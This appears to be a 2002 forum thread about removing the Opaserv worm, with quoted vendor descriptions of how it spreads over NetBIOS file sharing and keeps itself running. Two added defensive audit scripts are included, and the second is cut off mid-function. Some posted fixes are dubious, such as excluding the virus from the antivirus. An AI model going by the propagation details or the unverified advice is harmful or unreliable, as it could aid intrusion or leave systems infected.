Gawd. This one is a PITA. Norton popped up saying I had this virus on Monday, but was unable to delete/quarantine. I went to Norton's site and read up about it... it stated that the win.ini file would want to run tmp.ini, but I found my win.ini file pointed directly to windows/scrsvr.exe ... I edited my win.ini file (took that out of the run line) and then was able to delete the scrsvr.exe file. I did remove all other associated files that Norton tells you about as well.
Here's my problem: It keeps coming back. About every 15 minutes or so (estimated), Norton pops up saying I have the windows/scrsvr.exe file on my computer infected with the opaserv worm. It WILL quarantine now, but each time it writes to the win.ini file, adding the windows/scrsvr.exe bit in the run= line and I have to take it out again.
My HUNCH is there's still a little bug on the computer that periodically attempts to reinfect.
Since Norton (nor McAfee) doesn't report the exact symptoms I'm having, YET, I have little to do but wait for them to figure it all out... or do I?
Anybody out there help me out? It's really getting aggravating... and makes it hard to work or watch TV on my computer :0)

See the McAfee site below:
http://vil.mcafee.com/dispVirus.asp?virus_k=99729#indications

Thanks. Actually, I already saw this page. The solution it proposes is the same as Norton's ... delete the infected file.
I do this already (or Quarantine it - with the same result)... it just keeps coming back ad nauseam.

Check to see if it put itself on your Norton exclude list.
Then run the Symantec removal tool + follow the manual removal instructions:
http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.html

Have you disabled sharing drive c? You might try using the trial version of Solo from:
http://www.srnmicro.com, it has been successful at removing this. All the best!

It appears that Norton's instructions don't include these two files: ScrSin.dat and ScrSout.dat
You will need to find and delete these.
http://www3.ca.com/virusinfo/virus.asp?ID=13234

Switching off sharing of drive c: helps 100% - the virus will never return. It seems that it can use only c:\windows folder. If it is not possible, you may try an advice from the thread below - put empty or text file in c:\windows, rename it scrsvr.exe and make it read only (I didn't try this - but it looks reasonable).
BTW, when cleaning 20+ computers in our LAN I never found any ScrSin.dat or ScrSout.dat.
Good luck

That virus landed on my PC on saturday and I could get rid of it on monday (booting on safe mode, erase service in registry...etc) but nothing about the dat files.
The problem I have now because of Opaworm is that I disabled netbios (file sharing) on every card (ethernet and adsl modem) but when typing netstat -an in dos, the tcp port 139 is still opened and listening !!!! (also udp 137 and 138).
I uninstalled TCP/IP for my lancard and modem and reinstalled, disabled netbios and file sharing in network menus, to see that the tcp/139 was still listening. Can anyone help to definitely disable it ? (no firewall solutions plz, I use winME)
Thanx
Xav

Thanks for all the replies. It's not on Norton's exclude list, because Norton is what keeps telling me the virus (file) is there.
I found and deleted scrsin and scrsout first thing (regedit: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run ), as well as the tmp.ini in the root dir and scrsvr.exe in the windows dir, as well as editing win.ini to remove scrsvr.exe from the run line.
I have two computers on the network for work purposes... I hate to disable sharing because that would mean I'd have to resort to more mundane methods of file transfer, though I'd be willing to try it just to see if it stops putting itself on the drive.
Solo sounds interesting - never heard of it. I'll check it out.
First thing I will try is the empty scrsvr.exe file... I'll let you know how it goes. :) Even so, _something_ in there is causing scrsvr.exe to respawn (or at least be detected by Norton) and rewriting the win.ini file... it's not giving me a new tmp.ini or scrsin or scrsout file... it's that elusive little 'thing' I'm after I guess.
So in the meantime if I can get it to stop annoying me until the AV people figure out what's really going on, I'll be okay.
Thanks again.

Did you try the new removal tool Symantec has posted?
http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html
Also, have you password protected any open shares?

We have had three people (Win95 & 2 Win98) machines so far infected. All of them have lost the ability to print to any printers! Has anyone else had that problem?
I have to delete the printer, then re-add them.

Here's an odd thought: are you using Windows XP or Windows Millennium? If so, check this out: from the McAfee site. Hope it helps.
Surfer

Wow, what a can of.. er... worms... we've opened here.
It's been over an hour since my last 'Norton goes berserk' episode.
FTR: I'm running Win98se
Here's what I did (and I'll put it in very simple terms here for the technologically challenged):
o Open Windows Explorer
o Navigate to C:\Windows (or whatever directory Windows is installed in)
o Open Notepad - save a blank file as scrsvr.txt in the windows directory
o Go back to Explorer
o Click View > Folder Options > View Tab > then DEselect 'Hide file extensions for known file types'
o Find the scrsvr.txt file
o Right click on it, and select 'rename'
o Rename it to 'scrsvr.exe' (first delete the 'other one' if it's already there, and be sure to empty your recycle bin)
o Right click on the file again
o Select 'properties'
o Select 'read only' and deselect the other options
IMO - This only cripples the thing... SOMETHING is trying (and was succeeding before I did this) to CREATE the scrsvr.exe file, even when I'm offline.
Apparently this is a very hot topic, and very overwhelming. There's at least one other thread on this forum alone. One thing that I've noted is consistent - many people are experiencing symptoms, like mine, that are not addressed by Norton or McAfee (or others), and their removal instructions and tools aren't working.
At least Norton will be quiet for a while now.

Yipp, I've got it too and the virus fix provided by Symantec said the virus was not there even when it was. No entries found in registry and no Tmp file created. Win.ini points straight at c:\scrsvr. Got rid of it earlier but it came back. So far it has messed up mouse, printers and messaging services.
Will try the read only file trick, sounds like a good temp measure until the thing is fully sorted.

I have the same problem, virus: "Win32.Opasoft.a" is creating a file scrsvr.exe and even when I remove it from win.ini file and from its locations on C:\windows\scrsvr.exe IT DOES NOT HELP !!!
Obviously there is something invisible working in windows system or some kind of batch file. I can't disable C:\ drive because I'm working in small network environment.
I use "Kaspersky Anti Virus Pro" but even this software can't help resolve this problem.
How come NOBODY has answer or solution !!!
Would this mean that this is perfect virus ???
Who ever can help, please let me know

I mentioned this on the other thread but I found a file "koajgv.exe" which somehow also seemed to be involved.
RS

Add me to the list!!!...and let's keep this thread going until we figure this one out...
I have a client that got it on the 27th...I've gone thru all the Norton instructions, been following a couple other threads and trying their recommends, but this varmint keeps coming back...
Going to try both the Norton and Bit Defender removal tools tomorrow...will post back what luck I had...
Steve

Hey! Here is the solution for the W32.Opaserv.Worm virus -> http://www.terra.es/tecnologia/articulo/html/tec5875.htm
The only thing is that the website is in SPANISH.

Honestly, this problem was posted earlier and Solo from http://www.srnmicro.com was able to clean it for two other people. For some reason Norton, McAfee and Trend Micro just do not have the solution yet.

This is amazing, well... this website doesn't help at all, it has the same information as the others so don't waste your time (I have the same problem with Datom 1,2 & 3)
http://www.terra.es/tecnologia/articulo/html/tec5875.htm
I've tried all the removal tools for this virus, pqremove, symantec's (I can't remember the others) and they work... but only for a while !!, but man, I know it will be coming back again and again... I guess we should wait a little for the real answer.
I've pinged www.opasoftware.com (don't click on it... just in case) and it is strange, sometimes it appears with this IP 209.67.50.203 and 127.0.0.1 ??? <- this is funny... but anyways. I also read that it goes memory resident, maybe it is located in the MBR... should we try to find a removal tool but via a boot disk? mmm... Another thing, I've read that this virus is acquired when you access certain websites and I also read that there were 4 "major websites" involved in this issue. I don't know the addresses, maybe they are rumors but be careful... use an antivirus, maybe AntiVir can help you out and it's free... yeahhhh babyyy yeahhh this is an outbreak =)!!!!!

I have a variation of this worm (my virus checker is unable to see it at all! i.e., updated Symantec NAV 2002) - Registry entries have changed 4 times - Seems like it began life as thtrkf.exe, then tssg.exe (which I deleted in turn), then SCRSVR.exe which disappeared, then loadqm.exe - each time I deleted all references to these rogue files, they seemed to come back as mutations after locking my PC up on Restart -
Finally, I'm left with the situation of the win.ini files pointing to SCRSVR.exe which does not exist - will try your option of renaming an empty text file - Thanks Guys - Please don't give up on this one..
By the way, I did notice one other nasty little thing about this virus - If I isolate my machine from the net (& I have a good firewall - ZoneAlarm) the crap entries do NOT return.. this is interesting - maybe this virus polls another site for a viral update??

This is really a funny virus......WHY FUNNY?
are u using norton 2002? or a mcafee?
I am monitoring 53 computers here in my firm. And every time, I mean DAILY, I am updating my virus definition files. Last October 1, I updated all virus definitions with this date --> October 1, 2002 with the filename 20021001-008-i32.exe. Suddenly all viruses appear. Though I already updated my virus definition last Sept 30. And the virus release was on SEPT 28, why is that happen?.. IS THIS A BUSINESS? or a monkey business... I have a big doubt..
Look -> there is a new antivirus now NORTON 2003. a new release by norton company...
the virus is attached on the virus update last october 1.... hmm.... correct me if im wrong.....THE BEST SOLUTION IS -> BY A NORTON 2003 ..HE HEHE

hehe... see? that's the funny part, I guess it was triggered by something, an update or maybe that's the cause for checking an URL or the rumors with the websites (I don't have a network or shared drives so I don't know how I got infected) ...and I say this because the day and the date of infections are almost the same in all our cases... and in a few hours it is in the top 5 viruses of panda activescan? mmm well I deactivate my AntiVir and create the empty txt file named scrsvr.exe and it looks like it worked, give it a try

I think I have found another clue to licking this thing. All the documentation says that it puts entries into the Registry at HKCU\Software\Windows\CurrentVersion\Run. Well, I just found that it had created new keys in the Registry at ...CurrentVersion\Explorer\Discardable\DocFindSpecMRU and at ...\Explorer\RunMRU
I think that explains how it manages to keep coming back. I hope so. I have been fighting this thing since Monday.

My computer is now going down when I open files. I.e. if I try to open notepad the computer stops, the screen is black and I have to restart. My printers are not working. Norton can't help. I have tried response 18, but I don't think it helps.
Who has a good solution?
Albert

Response to number 24. You find the virus there because you have searched for scrsvr. In that key you find all the searches you did. Removing it did not help.

Albert, I also did everything McAfee gave me to do - in Safe Mode I changed Win.ini, deleted the file ScrSvr.exe. And, just in case it would help I ran the DOS scan program from McAfee. I searched the Registry for not only that file, but also the tmp.ini and the Scr*.dat files.
I have had the machine running now for more than an hour without any new surprises, which is much longer than before. McAfee was popping up with a new ScrSvr.exe file about every 15 minutes before. It may not be "cured", but something is better.

And, Albert is right. The file did return, but after a much longer time. Some program is still sitting in memory somewhere.

I have reinstalled my printers, they are now working again. But my computer is still going down after working about half an hour. I never had such a virus. Who can help me to remove this virus?
Albert

Hey
It's been over 20 hours since my last 'attack'... the read-only 'scrsvr.exe' DECOY works (see my previous post).
Norton and McAfee still aren't reporting the same symptoms I (and others) have had. I can't assume that their assessment of 'low risk' is accurate, since their report isn't, at least, not for my situation - maybe there's more than one variant out there.

*whistles* Damn. I've been battling with this one since last week in various guises. Here's a few of the files to look for - flsfr.exe, tssg.exe, dialer123.exe, mssg.exe ... and a whole bunch of alphabet soup exe's. I found and deleted the registry keys at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\DocFindSpecMRU and ...RunMRU. There's also an entry at the end of StreamSRU named MRUListEx that I'm wondering about.
BTW, my first 'symptom' on this was a constantly open listening port that was spamming continuously. This one is driving me nuts!

Kaspersky lab just posted some technical detail of the virus:
http://www.viruslist.com/eng/viruslist.html?id=52256

I'm having exactly the same problem. AVG Anti-virus finds and removes it but it keeps coming back.
It could be my imagination, but opening Internet Explorer seems to trigger it. I hope someone finds more info soon.

Use the method of the Blank TXT file, it really works... tnx maggie =0), I looked at my win.ini file and it appeared with a different character every single time, I guess when I reboot the pc it mutates, well try the txt file and relax this is going to be annoying us for a while

Well, here is what I have done...
Client got it on his laptop 2 days ago...
It does NOT appear in the registry where Norton says it should be...It DOES appear in the win.ini file and it appears in msconfig>startup...
I remove it from msconfig>startup and delete the line in win.ini and it will go away for a few hours, then comes back...
Norton and Bit Defender, as of last night, had removal tools posted...
I am now at another client with same characteristics as my laptop client...
I checked the msconfig>startup and win.ini file and the scrsvr.exe is listed...I did not delete the entries...
I ran Bit Defender removal tool first, it did NOT detect the worm...
I just finished running the Norton removal tool, and it found 3 instances, advised it could not delete...
The Norton removal tool finished running, then I could not close the Norton removal tool!!!...and it did not show it had found anything!!!
The NAV 2002 quarantine folder has NO scrsvr.exe files in it...
I'm going to try Maggie's idea next, the empty txt file and see if it has any effect...
On this particular computer, I don't think it is gone, but both the Norton and Bit Defender removal tools, at this point, do not seem to have deleted it, and that's not encouraging...
Also, read the Kaspersky site info posted up a little, it has some good background info...
More later
Steve

well i ran the symantec removal tool (http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html)....twice. the first time it said that it removed scrsvr.exe from my computer and the second time it congratulated me for having a virus free computer. *fine*. so i go back on line and turn off my zone alarm firewall to see what would happen....baff.....the virus shows up again and is quarantined by norton antivirus. whats the deal? the only way im able to keep virus from entering my computer is by using a fire wall. what now? suppose i do not want to use a fire wall because of an app that doesnt run well with one....e.g...some web conferencing. btw...i am on a lap top with no shared network....please help!

The best way I have found to get rid of this:
o run regedit, get rid of the scrsvr.exe in the run key.
o run sysedit, get rid of the run= line at the top of the file (if it points to tmp.ini or scrsvr.ini)
o delete tmp.ini from the c:\ directory
o delete scrsvr.exe from the c:\windows directory
o if you are using Norton, make sure your definitions are no older than 10/1/02
To keep it from coming back, go to the C drive and look for the sharing setup. If the share is named "C" just change it to something else unique. Windows will set this as the default name for sharing the drive, and this seems to be what it is looking for. The virus is not being regenerated from a file on your computer, it is coming in through the LAN and your file sharing.
Reboot.
We had it on 8 computers here - and no new ones have popped up in the last 2 days.
Your mileage may vary...

More info...Add to my posts # 17 and #35...
Bit Defender has a removal tool...
http://www.bitdefender.com/html/free_tools.php/
I tried it in a known infected machine and it did NOT identify the Opasrv worm...the computer has NAV2002 with the 10/02 definition file...it has popped about 10-15 Opasrv warnings...it will ask what to do and I can quarantine some times, delete other times, not consistent...
I checked before running Bit Defender removal, it had the scrsrv entry in the Win.ini and in msconfig>startup...There were NO entries in the registry...
I tried Norton's removal tool...
http://securityresponse.symantec.com/avcenter/tools.list.html
I had a little more luck with it...while the removal tool was running, NAV popped up with a warning on Opasrv, I quarantined it...but when the removal tool was finished, it had found one instance of Opasrv, and removed it...
But I could not "close" the Norton utility, the computer was partially locked up...at that point I had to shut down and restart...
I then opened msconfig>start and found the line scrsvr.exe, looked in the Win.ini file and it showed up as a run=scrsvr statement...
So, I assume I still have it...
Deb, post #31 makes reference to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\DocFindSpecMRU...
I looked at a standalone W98 machine, never on the Inet and never had email on it, and it has the DocFindSpecMRU and the RunMRU listed, so I don't know, but I suspect the worm did NOT add those keys...She also refers to flsfr.exe, tssg.exe., dialer123.exe, mssg.exe, and these are all files usually associated with backdoor trojan/worms...Good work Deb!...
Now, we need to determine if Opasrv is adding any of these files into the mix...
Check out http://www.viruslist.com/eng/viruslist.html?id=52256 on the Kaspersky site...this is a good "read" on how this varmit works...
So far, I have worked on 2 infections, a laptop and a W98 desktop...since we are a firm that supports small networks, about 200 clients, and some of them not well protected from viruses, I suspect in the next week or so I will be fighting this little bugger pretty regular...
But so far, I do NOT have a sure fire way to kill this thing...
And the confusing aspect in my 2 infections is in NEITHER case do the HKLM registry edits contain anything referring to ScrSvr=%worm name% as this is where I would expect it is able to "re-generate" itself and reappear after you think you got rid of it...I suspect it's gonna be a week or so before the "big boys" at Norton, et al, figure out a way to sure fire kill this thing and get an effective utility out there for us to use...
I was going to try Maggie's, post #8, idea but after reading the Kaspersky info, I decided that this thing probably has the ability to either overwrite the empty text file, or ignore it...Maggie, I know you have been "free" now for about a day, and maybe you really have found a method that will work...I hope so...
That's my stuff for now...
Lets keep the thread going...I know there is more info to share...
Steve

Another tool to try.
Good luck
http://www.pandasoftware.es/library/W32OpaservD_en.htm
Link worked at time of posting.

Maggie's idea did NOT work for me... I tried it before I came to this site...but nothing else seems to work either. I will Try again.
BTW - My symptoms included Rundll32.exe trying to access the internet. The only other time it has done that, was with the Trojan virus (I have removed that one).

Maggie,
Since trying your "fix" I have not had any more instances of SCRSVR.exe, but the startups in Win.ini are still trying to execute the text file substitute - have you removed these win.ini references on your machine & do they remain deleted OR is it necessary to put up with messages - "scrsver.exe file not executed, etc" at startup - My machine is periodically locking up at Shutdown also - anyone else got this??
Regards to all!

I've managed to put it to "sleep" by renaming my "c" share to something else..
[yes I have alphanumeric passwords, always have :)]
I know it's still there, dormant, but at least it's snoozing now till the AV companies catch up

Yes, my machines running Win98 get frozen every time I shut them down. (not the ones running XP Pro) I tried all the solutions posted, but still have the same recurrent virus problem. I hope someone finds a real fix soon. It is driving crazy my whole network.

I used Maggie's method yesterday and so far haven't had any more problems. I think that it puts the virus into remission, for now at least.
I've found that quite a few of my .jpg and .doc files have been duplicated and are being placed in multiple folders. Anyone else with this problem?

The latest version 10/04/02 of Opaserv.Worm virus removal tool works great.... if you follow instructions and be sure to disconnect from the internet and other PCs before running. Also clean up the Win.ini file removing run= value ( can be left if virus not found before win.ini is clean) and disabling or at least password protecting your file/printer sharing!

Maggie's tip of read-only scrsvr.exe in C:\windows 100% works on my Win98SE PC. I have not had an attack in hours when it used to occur every 5 mins or so (when I was on-line only).
Note my drives are fully shared with no password and I wanted to KEEP THEM that way so the text file solution is a cool temp work around until a proper permanent fix comes up.
If the read-only file solution does not work for you then you may have ANOTHER VIRUS such as BUGBEAR which a lot of people seem to be getting confused with this one.
Also the so called fix programs never work, they just clean it off for 5 minutes and then it comes back (if you are on-line). Only unsharing or passwording your shared drive works, but the text file solution is best. Dumb virus can't overwrite the file, haha.
Jake

I am sending out a special thanks to Maggie, tried her solution on Windows ME and have not had that stupid Norton's activated since trying her fix. I am more pissed off at Symantec and McAfee for not coming up with something better. It takes the hard efforts of all the techies out there to come up with something better than what Symantec tries to do. I applaud all of those out there who come up with better ways to solve problems on their own, instead of relying on the Corporations that don't know jack. Thanks Again MAGGIE!!!!

HERE'S THE SOLUTION....
Ok, everyone, I found a cure for being constantly
re-infected with the Opaserv/Opasoft virus. After doing
some research (see references below) I found that
disabling the "File & Printer sharing" in Windows did
the trick to keep me from being re-infected after cleaning
the virus. That solved the problem of being re-infected but
now I have a home network that is dysfunctional because I
can't be online and have file & printer sharing enabled.
Boy this stinks but for now it's the only safe thing to
do that I'm aware of.
Below is the info that tells how the Opaserv/Opasoft virus
finds its victims. All you need to do is be connected
to your ISP and it can get you!!!
PS: Maggie, you have to realize that putting a read only
copy of a file named c:\Windows\scrsvr.exe may stop this
virus from coming back but you will still be vulnerable
to the next virus that comes along and uses the
"File & Printer sharing" vulnerability that's built into
Windows. ---pete---
Full article on Opaserv Virus....
https://www.europe.f-secure.com/v-descs/opasoft.shtml
===============================================================
Excerpt from full article above...
To locate victim computers the worm scans networks by using port
137 (NETBIOS Name Service). The following subnets are scanned:
- current (infected) computer subnet (aa.bb.cc.??)
- two neighbor subnets (aa.bb.cc+1.?? , aa.bb.cc-1.??)
- random selected subnets (except several ones that are
"disabled" for scanning)
In case there is reply from an IP address (i.e. there is real
computer at this address), the worm also scans two subnets that
are neighbor to that address.
When "reply data" is received the worm checks the special field
in it. In case this field contains information that victim
computer has "File and Print Sharing" service activated, the worm
starts infection routine.
The infection routine specific SMB packets to the found IP
address by using port 139 (NETBIOS Session Service). These
packets cause the following actions:
1. The worm established connection with \\hostname\C resource on
a victim machine (where "hostname" is a victim machine's name,
that the worm gets this name from "reply" data).
2. In case the resource is protected by a password the worm
tries to open it with all one-symbol passwords (brute-force
attack).
3. In case of successful connection the worm sends its EXE file
to a victim machine. The packet also contains the destination
file name on the target computer: WINDOWS\scrsvr.exe
---end of excerpt---
=================================================================
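An added example, not part of any post in this thread: a small audit that checks the two conditions the excerpt and the cleanup posts above describe, namely a `run=`/`load=` autostart entry in win.ini that points at one of the worm's files, and a share that matches what the worm connects to (named "C", exposing the drive root, blank or one-character password). The function names, the sample win.ini and the share dictionaries are hypothetical and constructed for illustration; `password_len` is an assumed stand-in so the audit never handles the password itself.

```python
import ntpath
import re

# File names this thread and the vendor pages it links associate with Opaserv.
WORM_FILES = {"scrsvr.exe", "tmp.ini", "scrsin.dat", "scrsout.dat"}

# Constructed sample of an infected win.ini (not taken from a real machine).
SAMPLE_WIN_INI = r"""
[windows]
load=
run=c:\windows\scrsvr.exe c:\tools\clock.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""

# Constructed share inventory; "password_len" stands in for the real password.
SAMPLE_SHARES = [
    {"name": "C", "path": "C:\\", "password_len": 0},
    {"name": "WORKFILES", "path": "C:\\", "password_len": 9},
    {"name": "DOCS", "path": "D:\\DOCS", "password_len": 0},
]


def autostart_entries(win_ini_text):
    """Return (key, program) pairs from the run=/load= lines of [windows]."""
    entries, section = [], None
    for raw in win_ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section != "windows" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key in ("run", "load"):
            # Simplification: entries are split on spaces and commas, so
            # long paths that contain spaces are not handled.
            for prog in re.split(r"[,\s]+", value.strip()):
                if prog:
                    entries.append((key, prog))
    return entries


def suspicious_autostarts(win_ini_text):
    """Autostart entries whose file name matches one of WORM_FILES."""
    return [(key, prog) for key, prog in autostart_entries(win_ini_text)
            if ntpath.basename(prog).lower() in WORM_FILES]


def share_risk(share):
    """List which of the three conditions from the excerpt a share meets."""
    reasons = []
    if share["name"].upper() == "C":
        reasons.append("default share name C")
    # Only a share of the drive root contains the WINDOWS directory.
    if ntpath.splitdrive(share["path"])[1] in ("", "\\", "/"):
        reasons.append("exposes drive root")
    # The excerpt says the worm tries all one-symbol passwords.
    if share["password_len"] <= 1:
        reasons.append("blank or one-character password")
    return reasons


def exposed_shares(shares):
    """Names of shares that meet all three conditions at once."""
    return [s["name"] for s in shares if len(share_risk(s)) == 3]


if __name__ == "__main__":
    for key, prog in suspicious_autostarts(SAMPLE_WIN_INI):
        print(f"win.ini {key}= entry to remove: {prog}")
    for share in SAMPLE_SHARES:
        print(share["name"], "->", share_risk(share) or "no findings")
    print("reachable the way the excerpt describes:", exposed_shares(SAMPLE_SHARES))
```

A share that is renamed or given a longer password drops out of `exposed_shares`, which matches the mitigations reported in the thread; disabling sharing removes it from the inventory altogether.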

I got this virus after trying to install latest update of ZAPRO. Instructions were to switch off running version, which I did and promptly got 3 NAV warnings. 1st try wouldn't quarantine, 2nd wouldn't delete and 3rd finally quarantined. I stopped all activity and re-installed previous ZA firewall. Finally able to remove and delete all further (6) infections. I'll try Maggie's method for now and disconnect from the network to re-try ZAPRO install

Re the terra page in Spanish:
http://www.terra.es/tecnologia/articulo/html/tec5875.htm
After the 1st para there's a cream coloured box, wave the mouse over it, you'll see it's a link for downloading Panda Quick Remover.. right click and "save target as" will download it, then just click on it to run. It's free.
I've been using Panda Anti Virus for a while, IMO one of the best and their replies to queries are quick.. much better than Norton or McAfee... good luck

I have just tried Doug James' panda quick remover, it found and apparently got rid of it. I hope it works. This thing has been at me for well over a week grrr

Ok - about Panda remover tool :
when i tried to run it - my DR.Web antivirus told that the file pavcl.com infected with Win32.Benny.6382 virus - so , make Your own decisions about this so-called tool ....

Hi everyone,
I haven't responded in a while... not because the problem has 'gone away' (which it has), but because my 13 year old cat has apparently been infected with the BugBear virus. He's gone mad. Without warning, he has informed me through his actions that my daughter's bed, the front hall, and the floor beside the aquarium make MUCH better litterboxes than that thing he has to share with the other two. So... I've been going buggy away from the computer. I still love you though!
OK, my responses to a few posts since my last confession:
#38 - I've actually been 'free' since 11:16 am on 10/2, the time and date I created the dummy scrsvr.exe file :)
#40 - It might not have worked for you if you didn't mark the file as 'read-only'. This is a critical step that must not be skipped. Do the whole removal process over, then right click on the blank scrsvr.exe file you created and click 'properties'. Check the box beside 'read-only'. NOTHING can overwrite this file after you do that without your permission AFAIK. Make sure you go into win.ini after you create the file and remove that run line thing. Good luck.
#41 - Your computer is still trying to run scrsvr.exe because it's probably still in the run line of your win.ini file. If you've made the read-only dummy, go into win.ini and delete the string after the run= line that references c:\windows\scrsvr.exe ... it may have reappeared after you did this step before if you altered win.ini BEFORE you made your dummy file. Hope this helps.
#48 - OHHHHH YESSSS... I *DO* realize that simply disabling THIS virus doesn't protect me from the next. That's why I was so concerned about what mechanism was causing it to spawn so frequently. I think the suggestions here http://service4.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2000091415173339 and in post #37 (changing the name of your root directory) need to be followed in ADDITION to the dummy scrsvr.exe (read-only!!) file to protect you from future attacks.
I'm going to rename my C drive. I'm also going to change the password AND ensure my husband's root directory is also password protected.
. o O (Good god, he's listening to Ozzy Osbourne doing the Bee Gee's (Staying Alive). What is happening to my family!? )

OK. I couldn't at 1st remove the exe file from windows, it just continually spawned just as if it was a loop. It activated just by highlighting the file in Win explore. Even after disconnecting physically from the network it was there. I had to exclude it from NAV to continue. I run Win ME btw. I downloaded the tool from the Norton site, Disabled System Restore, which means re-starting afterwards. I then ran the tool which removed and repaired the worm files. Then I searched for the scrsvr.exe file, which of course wasn't there now. I renamed the scrsvr.txt file I previously had created to be the .exe file read only, re-enabled System Restore, and re-started. Seems to be ok now, but I'm not holding my breath. Point for ME users, you MUST disable System Restore before running the tool. You can re-enable it afterwards.

Hi
I tried this and it appears to have worked!! However, just wondering, do I need to do anything else? Is my computer ok with the scrsvr.exe read only file? I am hesitant to run another virus scan and screw things up but I don't want any viruses on my computer either. The win.ini file still has the run=c:windows.scrsver.exe message, is that ok to leave as well, since the virus stop popping up?

Hi!! I have followed Maggie's advice, and thx, so far it is working. One problem I appear to have are my system resources. They seem to be being eaten up rapidly and voraciously by an unknown being.. now could this being be the worm still? I am running NAV2002 as well as ZA Pro. If I disable ZA, my resources appear to magically appear again. Has anyone else had this problem, and does anyone have any clues?

I am a computer service technician in Aurora Colorado who was called out to repair an infection of this worm.
I experienced most of the same things you have all posted here:
-Norton's removal tool unable to locate the virus.
-Virus messages reappearing every 5.5 mins while connected to internet.
-Misplaced entries in the win.ini files.
Like most of you, I deleted the scrsvr.exe file, and removed the win.ini entries, and it did no good.
*SOLUTION* - After about 30mins of troubleshooting, I came to this solution:
1. Connect to internet; wait for Norton's virus warning to appear.
2. Select EXCLUDE (continue should work too) from the list of options presented on the warning screen, this will allow the virus to continue with its activity.
3. Download the appropriate virus removal tool from Symantec.com
4. Disable system restore if applicable.
5. Disconnect the computer from the internet, phone lines, and network.
6. Run the virus removal tool.
7. Scan the HD for any other infections.
8. When system is clean, enable system restore, reconnect phone lines, and reconnect network.
Hope this helps you too.
P.S. - These steps were used on systems running windows 98se and NAV 2002. For other versions and/or anti-virus programs, the ideas would be the same. Allow the virus to continue with what it is going to do, then remove it from your system.

I'm infected too, and used the read only trick, removed it from win.ini etc. Didn't work. I don't know if it helps anyone, but it opens the hosts file in the windir. Maybe someone could check which file is opening the hosts file. It also seems to crash Zonealarm pro, and even deletes the rules for scrsvr.

Re-start in MSMode, use command: dir scrsvr.exe (enter)
then: del scrsvr.exe (enter)
:exit
then windows restart, run Norton to see if it's still there; if clear, re-connect to outside world. It worked for us. If you are networked, disconnect before running antivirus. Good luck.

hey i also had this worm, i just did what maggie said and renamed it and i have not had one prob, my hard drives are still shared and i have not had norton come up once about it, some advice: just do what maggie says, it will work

Well I can offer you all 4 solutions:
-Info on this virus: http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.html
-The removal tool for this virus (FOLLOW ALL THE INSTRUCTIONS)
http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html
-Call NAV Virus Removal (Fee Based)
1-877-832-2811
-Call NAV Virus Removal 900 Line ($4.95/min)
1-900-646-0004
The main problem is that most people do not read all the instructions for the removal tool or they do not know how to do some of the methods.

This is what i found on this Virus- Some help here!
Upon Execution, W32.Opaserv.Worm does the following:
It will check for the value:
ScrSvrOld
under the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
and if the value exists, it will delete the file pointed to by the above registry value.
If the above value does not exist, it will then check if the value:
ScrSvr
under the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
exists, and if it does not, the worm will add the value:
ScrSvr %Windows%\ScrSvr.exe
under the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Next, it will check if it is being run as the file:
%Windows%\ScrSvr.exe
if not, it will copy itself to the above filename and add the value:
ScrSvrOld
under the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
After checking the registry values and the location from which the worm is executing, the worm will check if it is currently executing by creating a Mutex with the name:
ScrSvr31415
If it is not already executing the worm will register itself as a process under Win9x, or under other Operating Systems it will elevate the worm process priority.
The worm will then enumerate the network looking for "C\" shares and for each share it finds, it will copy itself to "C\Windows\scrsvr.exe". It also modifies
c\windows\win.ini
to read:
run= c:\tmp.ini
It will also create the file:
c\tmp.ini
which contains the text:
run= c:\windows\scrsvr.exe
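The win.ini to tmp.ini chain described in the post above can be checked on offline copies of the files. This is an added example, not code from the thread or from any vendor tool; the function names, verdict labels and sample file contents are assumptions made for illustration, and the suspect names are the ones posters in this thread report.

```python
import ntpath
import re

# File names this thread associates with Opaserv and its variants.
SUSPECT_NAMES = {"scrsvr.exe", "alevir.exe", "brasil.exe", "brasil.pif",
                 "marco!.scr", "instit.bat"}


def startup_entries(ini_text):
    """Programs named on run=/load= lines of the [windows] section.

    A file with no section header at all (the post's tmp.ini holds only a
    run= line) is read the same way.
    """
    entries, section = [], None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() not in ("run", "load"):
            continue
        if section not in (None, "windows"):
            continue
        # One line may list several programs, separated by spaces or commas.
        entries += [p for p in re.split(r"[,\s]+", value.strip()) if p]
    return entries


def norm(path):
    """Normalise a DOS path for comparison: backslashes, lower case."""
    return ntpath.normpath(path.replace("/", "\\")).lower()


def trace_startup(files, start=r"c:\windows\win.ini"):
    """Follow run=/load= entries from win.ini through any .ini they name.

    files maps a path to the text of an offline copy of that file.
    Returns (chain, target, verdict) tuples; chain lists the ini files
    walked to reach target.
    """
    files = {norm(p): text for p, text in files.items()}
    findings, seen = [], set()

    def walk(ini_path, chain):
        if ini_path in seen:          # ini files that name each other
            return
        seen.add(ini_path)
        chain = chain + [ini_path]
        for entry in startup_entries(files[ini_path]):
            target = norm(entry)
            name = ntpath.basename(target)
            if name.endswith(".ini"):
                # A startup line that points at another ini is the
                # indirection the post describes; record it and follow it.
                findings.append((chain, target, "indirect"))
                if target in files:
                    walk(target, chain)
            elif name in SUSPECT_NAMES:
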